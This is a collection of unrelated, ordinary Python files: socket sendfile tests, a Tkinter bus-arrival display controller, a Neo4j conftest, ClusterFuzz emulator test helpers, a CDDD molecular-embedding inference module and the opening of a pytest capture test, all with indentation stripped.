file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=0.01) as sock, \
file as file:
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(thread, 'Threading required for this test.')
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
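# For reference (hedged, not part of the tests): application code would call
# the public wrapper rather than the private helpers exercised above, e.g.
#   with open(path, 'rb') as f, socket.create_connection(addr) as sock:
#       sock.sendfile(f)   # picks os.sendfile() when available, else send()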
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
bus_controller.py
|
from __init__ import *
class BusController(object):
def __init__(self):
self._logger = logging.getLogger('{}.{}'.format(cfg.LOGGER_BASE_NAME, self.__class__.__name__))
self._root = tk.Tk()
self._bus_view = BusView(master=self._root, controller=self)
self._bus_data = HomeBusAlerter()
self._is_running = False
self._current_lines_data: Dict[Tuple[int, int], LineData] = {}
self._current_lines_data_lock = threading.RLock()
self._logger.info('finished init')
def run(self):
self._is_running = True
self.ts_thread = threading.Thread(target=self.update_time_thread)
self.ts_thread.start()
self.tt_thread = threading.Thread(target=self.update_time_tables_thread)
self.tt_thread.start()
self.lu_thread = threading.Thread(target=self.update_last_updated_sec_thread)
self.lu_thread.start()
self._root.mainloop()
self._logger.info('main loop done')
def update_time_thread(self):
while self._is_running:
ts = datetime.now().strftime(cfg.TIME_FORMAT)
self._bus_view.update_time(ts=ts)
time.sleep(1)
def update_time_tables_thread(self):
while self._is_running:
for station_num, data in cfg.STATIONS_LINES_DICTIONARY.items():
line_filter = data['filter']
d = self._bus_data.get_data_from_bus_station_num(bus_station_num=station_num, line_filter=line_filter, bus_station_name=data['name'])
with self._current_lines_data_lock:
for l_d in d:
self._current_lines_data[(l_d.station_num, l_d.line_num)] = l_d
self._bus_view.update_time_tables(data=d)
time.sleep(cfg.TIME_WAIT_BETWEEN_REFRESH_SEC)
def update_last_updated_sec_thread(self):
while self._is_running:
with self._current_lines_data_lock:
for (station_num, bus_num), data in self._current_lines_data.items():
last_updated = int((datetime.now() - data.creation_time).total_seconds())
if last_updated < 60:
self._bus_view.update_last_updated_time(station_num=station_num, bus_num=bus_num, new_last_updated_time_sec=last_updated)
else:
self._bus_view.update_last_updated_time(station_num=station_num, bus_num=bus_num,
new_last_updated_time_sec='outdated')
time.sleep(1)
def kill(self):
self._is_running = False
self._bus_data.kill()
self.ts_thread.join(5)
self.tt_thread.join(5)
self._logger.info('all threads killed')
def init_logging(level):
root_logger = logging.getLogger()
root_logger.setLevel(level=logging.INFO)
file_name = os.path.join('logs', 'BusAlerter_{}'.format(datetime.now().strftime('%d_%m_%y__%H_%M_%S')))
file_handler = DiskSpaceRotatingFileHandler(folder_max_size=10E6, filename=file_name, maxBytes=1E6, backupCount=10000)
formatter = logging.Formatter(fmt=u'%(asctime)s:%(name)s:%(levelname)s:%(message)s')
file_handler.setFormatter(formatter)
console_handler = logging.StreamHandler()
console_handler.setFormatter(formatter)
logging._defaultFormatter = logging.Formatter(u"%(message)s") # so utf8 messages will not crash the logging
root_logger.addHandler(hdlr=file_handler)
root_logger.addHandler(hdlr=console_handler)
mylogger = logging.getLogger(cfg.LOGGER_BASE_NAME)
mylogger.setLevel(level=level)
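# Sketch (assumption, not part of the application): other modules are expected
# to log through child loggers of cfg.LOGGER_BASE_NAME so they inherit the
# handlers configured above, e.g.
#   log = logging.getLogger('{}.{}'.format(cfg.LOGGER_BASE_NAME, 'MyComponent'))
#   log.info('component started')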
if __name__ == '__main__':
init_logging(logging.DEBUG)
controller = BusController()
controller.run()
|
conftest.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright (c) "Neo4j"
# Neo4j Sweden AB [http://neo4j.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import os
import time
from platform import system
from threading import Thread
from time import sleep
from boltkit.server.stub import BoltStubService
from pytest import fixture
import logging
log = logging.getLogger("neo4j")
# from neo4j.debug import watch
# watch("neo4j")
class StubServer:
def __init__(self, port, script):
self.port = port
self.script = os.path.join(os.path.dirname(__file__), "scripts", script)
def run(self):
shell = system() == "Windows" # I hate myself for doing this
self._process = subprocess.Popen(["python", "-m", "boltkit", "stub", "-v", "-l", ":{}".format(str(self.port)), "-t", "10", self.script], stdout=subprocess.PIPE, shell=shell)
# Need verbose for this to work
line = self._process.stdout.readline().decode("utf-8")
log.debug("started stub server {}".format(self.port))
log.debug(line.strip("\n"))
def wait(self):
while True:
return_code = self._process.poll()
if return_code is not None:
line = self._process.stdout.readline()
if not line:
break
try:
line = line.decode("utf-8")
line = line.strip("\n")
except UnicodeDecodeError:
pass
log.debug(line)
return True
def kill(self):
# Kill process if not already dead
if self._process.poll() is None:
self._process.kill()
class StubCluster:
def __init__(self, servers):
self.servers = {port: StubServer(port, script) for port, script in dict(servers).items()}
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_value, traceback):
self.wait()
def start(self):
for port, server in self.servers.items():
server.run()
def wait(self):
success = True
for port, server in self.servers.items():
if not server.wait():
success = False
server.kill()
if not success:
raise Exception("Stub server failed")
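# Hedged usage sketch (port and script name are hypothetical): a test drives
# the cluster as a context manager; start() runs on enter and wait() checks on
# exit that every scripted conversation completed:
#   with StubCluster({9001: "example.script"}):
#       ...  # connect a driver to bolt://localhost:9001 and run the session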
class LegacyStubServer(Thread):
def __init__(self, port, script):
super(LegacyStubServer, self).__init__()
self.port = port
self.script = os.path.join(os.path.dirname(__file__), "scripts", script)
def run(self):
subprocess.check_call(["python", "-m", "boltkit.legacy.stub", "-v", str(self.port), self.script])
class LegacyStubCluster:
def __init__(self, servers):
self.servers = {port: LegacyStubServer(port, script) for port, script in dict(servers).items()}
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_value, traceback):
self.wait()
def start(self):
for port, server in self.servers.items():
server.start()
sleep(0.5)
def wait(self):
for port, server in self.servers.items():
server.join()
class DefaultBoltStubService(BoltStubService):
default_base_port = 9001
class StubCluster(StubCluster):
def __init__(self, *servers):
print("")
scripts = [os.path.join(os.path.dirname(__file__), "scripts", server) for server in servers]
bss = DefaultBoltStubService.load(*scripts)
servers2 = {port: script.filename for port, script in bss.scripts.items()}
super().__init__(servers2)
# def run():
# check_call(["bolt", "stub", "-v", "-t", "10", "-l", ":9001"] + scripts)
# self.thread = Thread(target=run)
# def __enter__(self):
# self.thread.start()
# sleep(0.5)
# def __exit__(self, exc_type, exc_value, traceback):
# self.thread.join(3)
@fixture
def script():
return lambda *paths: os.path.join(os.path.dirname(__file__), "scripts", *paths)
@fixture
def driver_info():
"""Connection settings for tests that integrate with a (stub) server."""
return {
"uri_bolt": "bolt://localhost:9001",
"uri_neo4j": "neo4j://localhost:9001",
"user": "test",
"password": "test",
"auth_token": ("test", "test")
}
|
test_utils.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generic helper functions useful in tests."""
from builtins import object
from builtins import str
from future import standard_library
standard_library.install_aliases()
import atexit
import datetime
import io
import os
import requests
import shutil
import six
import socket
import subprocess
import sys
import tempfile
import threading
import unittest
from config import local_config
from datastore import data_types
from datastore import ndb_init
from google_cloud_utils import pubsub
from system import environment
from system import process_handler
CURRENT_TIME = datetime.datetime.utcnow()
EMULATOR_TIMEOUT = 20
# Per-process emulator instances.
_emulators = {}
def create_generic_testcase(created_days_ago=28):
"""Create a simple test case."""
testcase = data_types.Testcase()
# Add more values here as needed. Intended to be the bare minimum for what we
# need to simulate a test case.
testcase.absolute_path = '/a/b/c/test.html'
testcase.crash_address = '0xdeadbeef'
testcase.crash_revision = 1
testcase.crash_state = 'crashy_function()'
testcase.crash_stacktrace = testcase.crash_state
testcase.crash_type = 'fake type'
testcase.comments = 'Fuzzer: test'
testcase.fuzzed_keys = 'abcd'
testcase.minimized_keys = 'efgh'
testcase.fuzzer_name = 'fuzzer1'
testcase.open = True
testcase.one_time_crasher_flag = False
testcase.job_type = 'test_content_shell_drt'
testcase.status = 'Processed'
testcase.timestamp = CURRENT_TIME - datetime.timedelta(days=created_days_ago)
testcase.project_name = 'project'
testcase.platform = 'linux'
testcase.put()
return testcase
def entities_equal(entity_1, entity_2, check_key=True):
"""Return a bool on whether two input entities are the same."""
if check_key:
return entity_1.key == entity_2.key
return entity_1.to_dict() == entity_2.to_dict()
def entity_exists(entity):
"""Return a bool on whether the entity exists in datastore."""
return entity.get_by_id(entity.key.id())
def adhoc(func):
"""Mark the testcase as an adhoc. Adhoc tests are NOT expected to run before
merging and are NOT counted toward test coverage; they are used to test
tricky situations.
Another way to think about it is that, if there was no adhoc test, we
would write a Python script (which is not checked in) to test what we want
anyway... so, it's better to check in the script.
For example, downloading a chrome revision (10GB) and
unpacking it. It can be enabled using the env ADHOC=1."""
return unittest.skipIf(not environment.get_value('ADHOC', False),
'Adhoc tests are not enabled.')(
func)
def integration(func):
"""Mark the testcase as integration because it depends on network resources
and/or is slow. The integration tests should, at least, be run before
merging and are counted toward test coverage. It can be enabled using the
env INTEGRATION=1."""
return unittest.skipIf(not environment.get_value('INTEGRATION', False),
'Integration tests are not enabled.')(
func)
def slow(func):
"""Slow tests which are skipped during presubmit."""
return unittest.skipIf(not environment.get_value('SLOW_TESTS', True),
'Skipping slow tests.')(
func)
def reproduce_tool(func):
"""Tests for the test case reproduction script."""
return unittest.skipIf(
not environment.get_value('REPRODUCE_TOOL_TESTS', False),
'Skipping reproduce tool tests.')(
func)
# TODO(mbarbella): Remove this and all users after fully migrating to Python 3.
def python2_only(func):
"""Tests which can only run on Python 2."""
return unittest.skipIf(sys.version_info.major != 2,
'Skipping Python 2-only test.')(
func)
def android_device_required(func):
"""Skip Android-specific tests if we cannot run them."""
reason = None
if not environment.get_value('ANDROID_SERIAL'):
reason = 'Android device tests require that ANDROID_SERIAL is set.'
elif not environment.get_value('INTEGRATION'):
reason = 'Integration tests are not enabled.'
elif environment.platform() != 'LINUX':
reason = 'Android device tests can only run on a Linux host.'
return unittest.skipIf(reason is not None, reason)(func)
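# Hedged usage sketch: the markers above wrap unittest.skipIf, so they are
# stacked directly on test methods or classes (names below are hypothetical):
#   class DeviceFlowTest(unittest.TestCase):
#     @android_device_required
#     @slow
#     def test_end_to_end(self):
#       ...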
class EmulatorInstance(object):
"""Emulator instance."""
def __init__(self, proc, port, read_thread, data_dir):
self._proc = proc
self._port = port
self._read_thread = read_thread
self._data_dir = data_dir
def cleanup(self):
"""Stop and clean up the emulator."""
process_handler.terminate_root_and_child_processes(self._proc.pid)
self._read_thread.join()
if self._data_dir:
shutil.rmtree(self._data_dir, ignore_errors=True)
def reset(self):
"""Reset emulator state."""
req = requests.post('http://localhost:{}/reset'.format(self._port))
req.raise_for_status()
def _find_free_port():
"""Find a free port."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
sock.close()
return port
def wait_for_emulator_ready(proc,
emulator,
indicator,
timeout=EMULATOR_TIMEOUT,
output_lines=None):
"""Wait for emulator to be ready."""
def _read_thread(proc, ready_event):
"""Thread to continuously read from the process stdout."""
ready = False
while True:
line = proc.stdout.readline()
if not line:
break
if output_lines is not None:
output_lines.append(line)
if not ready and indicator in line:
ready = True
ready_event.set()
# Wait for process to become ready.
ready_event = threading.Event()
thread = threading.Thread(target=_read_thread, args=(proc, ready_event))
thread.daemon = True
thread.start()
if not ready_event.wait(timeout):
raise RuntimeError(
'{} emulator did not get ready in time.'.format(emulator))
return thread
def start_cloud_emulator(emulator, args=None, data_dir=None):
"""Start a cloud emulator."""
ready_indicators = {
'datastore': b'is now running',
'pubsub': b'Server started',
}
default_flags = {
'datastore': ['--no-store-on-disk', '--consistency=1'],
'pubsub': [],
}
if emulator not in ready_indicators:
raise RuntimeError('Unsupported emulator')
if data_dir:
cleanup_dir = None
else:
temp_dir = tempfile.mkdtemp()
data_dir = temp_dir
cleanup_dir = temp_dir
port = _find_free_port()
command = [
'gcloud', 'beta', 'emulators', emulator, 'start',
'--data-dir=' + data_dir, '--host-port=localhost:' + str(port),
'--project=' + local_config.GAEConfig().get('application_id')
]
if args:
command.extend(args)
command.extend(default_flags[emulator])
# Start emulator.
proc = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
thread = wait_for_emulator_ready(proc, emulator, ready_indicators[emulator])
# Set env vars.
env_vars = subprocess.check_output([
'gcloud', 'beta', 'emulators', emulator, 'env-init',
'--data-dir=' + data_dir
])
for line in env_vars.splitlines():
key, value = line.split()[1].split(b'=')
os.environ[key.strip().decode('utf-8')] = value.strip().decode('utf-8')
return EmulatorInstance(proc, port, thread, cleanup_dir)
def create_pubsub_topic(client, project, name):
"""Create topic if it doesn't exist."""
full_name = pubsub.topic_name(project, name)
if client.get_topic(full_name):
return
client.create_topic(full_name)
def create_pubsub_subscription(client, project, topic, name):
"""Create subscription if it doesn't exist."""
topic_name = pubsub.topic_name(project, topic)
full_name = pubsub.subscription_name(project, name)
if client.get_subscription(full_name):
return
client.create_subscription(full_name, topic_name)
def setup_pubsub(project):
"""Set up pubsub topics and subscriptions."""
config = local_config.Config('pubsub.queues')
client = pubsub.PubSubClient()
queues = config.get('resources')
for queue in queues:
create_pubsub_topic(client, project, queue['name'])
create_pubsub_subscription(client, project, queue['name'], queue['name'])
def with_cloud_emulators(*emulator_names):
"""Decorator for starting cloud emulators from a unittest.TestCase."""
def decorator(cls):
"""Decorator."""
class Wrapped(cls):
"""Wrapped class."""
@classmethod
def setUpClass(cls):
"""Class setup."""
for emulator_name in emulator_names:
if emulator_name not in _emulators:
_emulators[emulator_name] = start_cloud_emulator(emulator_name)
atexit.register(_emulators[emulator_name].cleanup)
if emulator_name == 'datastore':
cls._context_generator = ndb_init.context()
cls._context_generator.__enter__()
super(Wrapped, cls).setUpClass()
@classmethod
def tearDownClass(cls):
"""Class teardown."""
for emulator_name in emulator_names:
if emulator_name == 'datastore':
cls._context_generator.__exit__(None, None, None)
super(Wrapped, cls).tearDownClass()
def setUp(self):
for emulator in six.itervalues(_emulators):
emulator.reset()
super(Wrapped, self).setUp()
Wrapped.__module__ = cls.__module__
Wrapped.__name__ = cls.__name__
return Wrapped
return decorator
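# Hedged usage sketch (test class and method are hypothetical): the decorator
# wraps a TestCase so emulators start once per process, their env vars are
# exported, and each emulator is reset in setUp():
#   @with_cloud_emulators('datastore')
#   class TestcaseStorageTest(unittest.TestCase):
#     def test_roundtrip(self):
#       testcase = create_generic_testcase()
#       self.assertTrue(entity_exists(testcase))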
def set_up_pyfakefs(test_self):
"""Helper to set up Pyfakefs."""
real_cwd = os.path.realpath(os.getcwd())
config_dir = os.path.realpath(environment.get_config_directory())
test_self.setUpPyfakefs()
test_self.fs.add_real_directory(config_dir, lazy_read=False)
os.chdir(real_cwd)
def supported_platforms(*platforms):
"""Decorator for enabling tests only on certain platforms."""
def decorator(func): # pylint: disable=unused-argument
"""Decorator."""
return unittest.skipIf(environment.platform() not in platforms,
'Unsupported platform.')(
func)
return decorator
class MockStdout(io.BufferedWriter):
"""Mock stdout."""
def __init__(self):
super(MockStdout, self).__init__(io.BytesIO())
def getvalue(self):
self.flush()
return self.raw.getvalue()
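# Hedged usage sketch: MockStdout buffers bytes in memory and exposes them via
# getvalue(), e.g. for capturing binary output in a test:
#   out = MockStdout()
#   out.write(b'hello')
#   assert out.getvalue() == b'hello'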
|
inference.py
|
"""Helper functions to run inference on trained models"""
import argparse
import os
import sys
import numpy as np
import tensorflow as tf
import multiprocessing as mp
import json
import zipfile
from cddd.input_pipeline import InputPipelineInferEncode, InputPipelineInferDecode
from cddd.hyperparameters import add_arguments, create_hparams
from cddd.model_helper import build_models
from cddd.hyperparameters import DEFAULT_DATA_DIR
try:
import zmq
except ImportError:
print("Consider installing the package zmq to utilize the InferenceServer class")
_default_model_dir = os.path.join(DEFAULT_DATA_DIR, 'default_model')
def download_model(model_dir):
if not os.path.isdir(model_dir):
sys.path.append(DEFAULT_DATA_DIR)
from download_pretrained import download_file_from_google_drive, FILE_ID
parent_dir = os.path.abspath(os.path.join(model_dir, os.pardir))
destination = os.path.join(parent_dir, "default_model.zip")
download_file_from_google_drive(FILE_ID, destination)
with zipfile.ZipFile(destination, 'r') as zip_ref:
zip_ref.extractall(parent_dir)
def sequence2embedding(model, hparams, seq_list):
"""Helper Function to run a forwards path up to the bottneck layer (ENCODER).
Encodes a list of sequences into the molecular descriptor.
Args:
model: The translation model instance to use.
hparams: Hyperparameter object.
seq_list: List of sequences that should be encoded.
Returns:
Embedding of the input sequences as a numpy array.
"""
emb_list = []
with model.graph.as_default():
input_pipeline = InputPipelineInferEncode(seq_list, hparams)
input_pipeline.initilize()
model.model.restore(model.sess)
while 1:
try:
input_seq, input_len = input_pipeline.get_next()
emb = model.model.seq2emb(model.sess, input_seq, input_len)
emb_list.append(emb)
except StopIteration:
break
embedding_array = np.concatenate(emb_list)
return embedding_array
def embedding2sequence(model, hparams, embedding, num_top=1, maximum_iterations=1000):
"""Helper Function to run a forwards path from thebottneck layer to
output (DECODER).
Args:
model: The translation model instance to use.
hparams: Hyperparameter object.
embedding: Array of shape (num_samples, num_features).
Returns:
List of sequences decoded from the input embedding (descriptor).
"""
seq_list = []
with model.graph.as_default():
input_pipeline = InputPipelineInferDecode(embedding, hparams)
input_pipeline.initilize()
model.model.restore(model.sess)
while 1:
try:
emb = input_pipeline.get_next()
seq = model.model.emb2seq(model.sess, emb, num_top, maximum_iterations)
if num_top == 1:
seq = [s[0] for s in seq]
seq_list.extend(seq)
except StopIteration:
break
# unwrap the result if a single sequence was decoded
if (len(seq_list) == 1) and isinstance(seq_list[0], str):
return seq_list[0]
return seq_list
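# --- Usage sketch (illustrative only) ---------------------------------------
# A minimal sketch of the two helpers above, assuming hparams and the models
# were built the same way InferenceModel below does; the SMILES strings are
# just examples.
#
#     encode_model, decode_model = build_models(hparams, modes=["ENCODE", "DECODE"])
#     emb = sequence2embedding(encode_model, hparams, ["CCO", "c1ccccc1"])
#     seqs = embedding2sequence(decode_model, hparams, emb)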
class InferenceModel(object):
"""Class that handles the inference of a trained model."""
def __init__(self, model_dir=_default_model_dir, use_gpu=True, batch_size=256,
gpu_mem_frac=0.1, beam_width=10, num_top=1, maximum_iterations=1000,
cpu_threads=5, emb_activation=None):
"""Constructor for the inference model.
Args:
model_dir: Path to the model directory.
use_gpu: Flag for GPU usage.
batch_size: Number of samples to process per step.
gpu_mem_frac: If GPU is used, what memory fraction should be used?
beam_width: Width of the window used for the beam search decoder.
num_top: Number of most probable sequences output by the beam search decoder.
emb_activation: Activation function used in the bottleneck layer.
Returns:
None
"""
self.num_top = num_top
self.use_gpu = use_gpu
parser = argparse.ArgumentParser()
add_arguments(parser)
flags = parser.parse_args([])
flags.hparams_from_file = True
flags.save_dir = model_dir
download_model(model_dir)
self.hparams = create_hparams(flags)
self.hparams.set_hparam("save_dir", model_dir)
self.hparams.set_hparam("batch_size", batch_size)
self.hparams.set_hparam("gpu_mem_frac", gpu_mem_frac)
self.hparams.add_hparam("beam_width", beam_width)
self.hparams.set_hparam("cpu_threads", cpu_threads)
self.encode_model, self.decode_model = build_models(self.hparams,
modes=["ENCODE", "DECODE"])
self.maximum_iterations = maximum_iterations
def seq_to_emb(self, seq):
"""Helper function to calculate the embedding (molecular descriptor) for input sequnce(s)
Args:
seq: Single sequence or list of sequences to encode.
Returns:
Embedding of the input sequence(s).
"""
if isinstance(seq, str):
seq = [seq]
if self.use_gpu:
emb = sequence2embedding(self.encode_model, self.hparams, seq)
else:
with tf.device("/cpu:0"):
emb = sequence2embedding(self.encode_model, self.hparams, seq)
return emb
def emb_to_seq(self, embedding):
"""Helper function to calculate the sequnce(s) for one or multiple (concatinated)
embedding.
Args:
embedding: Array of shape (n_samples, num_features).
Returns:
Sequence(s) decoded from the input embedding(s).
"""
if embedding.ndim == 1:
embedding = np.expand_dims(embedding, 0)
if self.use_gpu:
seq = embedding2sequence(self.decode_model, self.hparams, embedding, self.num_top, self.maximum_iterations)
else:
with tf.device("/cpu:0"):
seq = embedding2sequence(self.decode_model, self.hparams, embedding, self.num_top, self.maximum_iterations)
if len(seq) == 1:
seq = seq[0]
if len(seq) == 1:
seq = seq[0]
return seq
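# --- Usage sketch (illustrative only) ---------------------------------------
# A minimal sketch, assuming the default pretrained model is available (it is
# downloaded on first use) and that the inputs are valid SMILES strings.
#
#     infer_model = InferenceModel(use_gpu=False)
#     emb = infer_model.seq_to_emb(["CCO", "c1ccccc1"])  # one descriptor row per molecule
#     smiles = infer_model.emb_to_seq(emb)               # decode the descriptors back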
class InferenceServer():
def __init__(self, model_dir=_default_model_dir, num_servers=1, port_frontend="5559", port_backend="5560",
batch_size=256, gpu_mem_frac=0.3, beam_width=10, num_top=1, maximum_iterations=1000, use_running=False):
self.model_dir = model_dir
self.port_frontend = port_frontend
self.port_backend = port_backend
self.batch_size = batch_size
self.gpu_mem_frac = gpu_mem_frac
self.beam_width = beam_width
self.maximum_iterations = maximum_iterations
self.num_top = num_top
if not use_running:
self.gpus = os.environ.get('CUDA_VISIBLE_DEVICES').split(',')
mp.Process(target=self._init_device).start()
for i in range(num_servers):
os.environ['CUDA_VISIBLE_DEVICES'] = self.gpus[i%len(self.gpus)]
mp.Process(target=self._init_server).start()
def _init_device(self):
try:
context = zmq.Context(1)
# Socket facing clients
frontend = context.socket(zmq.XREP)
frontend.bind("tcp://*:%s" % self.port_frontend)
# Socket facing services
backend = context.socket(zmq.XREQ)
backend.bind("tcp://*:%s" % self.port_backend)
zmq.device(zmq.QUEUE, frontend, backend)
except:
print("bringing down zmq device")
finally:
pass
frontend.close()
backend.close()
context.term()
def _init_server(self):
infer_model = InferenceModel(
model_dir=self.model_dir,
gpu_mem_frac=self.gpu_mem_frac,
use_gpu=True,
batch_size=self.batch_size,
beam_width=self.beam_width,
maximum_iterations=self.maximum_iterations
)
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.connect("tcp://localhost:%s" % self.port_backend)
print("Server running on GPU ", os.environ['CUDA_VISIBLE_DEVICES'])
while True:
inp = json.loads(socket.recv())
if inp[0]:
embeddings = infer_model.seq_to_emb(inp[1])
socket.send_string(json.dumps(embeddings.tolist()))
else:
smiles = infer_model.emb_to_seq(np.array(inp[1]))
socket.send_string(json.dumps(smiles))
def seq_to_emb(self, smiles):
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://localhost:%s" % self.port_frontend)
socket.send_string(json.dumps((1, smiles)))
emb = np.array(json.loads(socket.recv()))
return emb
def emb_to_seq(self, emb):
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://localhost:%s" % self.port_frontend)
socket.send_string(json.dumps((0, emb.tolist())))
emb = json.loads(socket.recv())
return emb
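# --- Usage sketch (illustrative only) ---------------------------------------
# A minimal sketch of the client/server split, assuming zmq is installed and
# the default ports are free. One process starts the queue device plus the
# worker server(s); other processes pass use_running=True and only talk to
# the frontend port.
#
#     # process A: start device + GPU worker(s)
#     InferenceServer(num_servers=1, use_running=False)
#
#     # process B: lightweight client reusing the running device
#     client = InferenceServer(use_running=True)
#     emb = client.seq_to_emb(["CCO"])
#     smiles = client.emb_to_seq(emb)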
|
test_capture.py
|
from __future__ import absolute_import, division, print_function
# note: py.io capture tests were copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
from __future__ import with_statement
import pickle
import os
import sys
from io import UnsupportedOperation
import _pytest._code
import py
import pytest
import contextlib
from _pytest import capture
from _pytest.capture import CaptureManager
from _pytest.main import EXIT_NOTESTSCOLLECTED
needsosdup = pytest.mark.xfail("not hasattr(os, 'dup')")
if sys.version_info >= (3, 0):
def tobytes(obj):
if isinstance(obj, str):
obj = obj.encode('UTF-8')
assert isinstance(obj, bytes)
return obj
def totext(obj):
if isinstance(obj, bytes):
obj = str(obj, 'UTF-8')
assert isinstance(obj, str)
return obj
else:
def tobytes(obj):
if isinstance(obj, unicode):
obj = obj.encode('UTF-8')
assert isinstance(obj, str)
return obj
def totext(obj):
if isinstance(obj, str):
obj = unicode(obj, 'UTF-8')
assert isinstance(obj, unicode)
return obj
def oswritebytes(fd, obj):
os.write(fd, tobytes(obj))
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def StdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.SysCapture)
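# --- Usage sketch (illustrative only) ---------------------------------------
# A minimal sketch of the MultiCapture lifecycle exercised throughout this
# module, using the in-memory StdCapture helper defined above (no file
# descriptors required):
#
#     cap = StdCapture()
#     cap.start_capturing()
#     print("hello")
#     out, err = cap.readouterr()   # -> ("hello\n", "")
#     cap.stop_capturing()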
class TestCaptureManager(object):
def test_getmethod_default_no_fd(self, monkeypatch):
from _pytest.capture import pytest_addoption
from _pytest.config import Parser
parser = Parser()
pytest_addoption(parser)
default = parser._groups[0].options[0].default
assert default == "fd" if hasattr(os, "dup") else "sys"
parser = Parser()
monkeypatch.delattr(os, 'dup', raising=False)
pytest_addoption(parser)
assert parser._groups[0].options[0].default == "sys"
@needsosdup
@pytest.mark.parametrize("method",
['no', 'sys', pytest.mark.skipif('not hasattr(os, "dup")', 'fd')])
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
outerr = capman.suspend_global_capture()
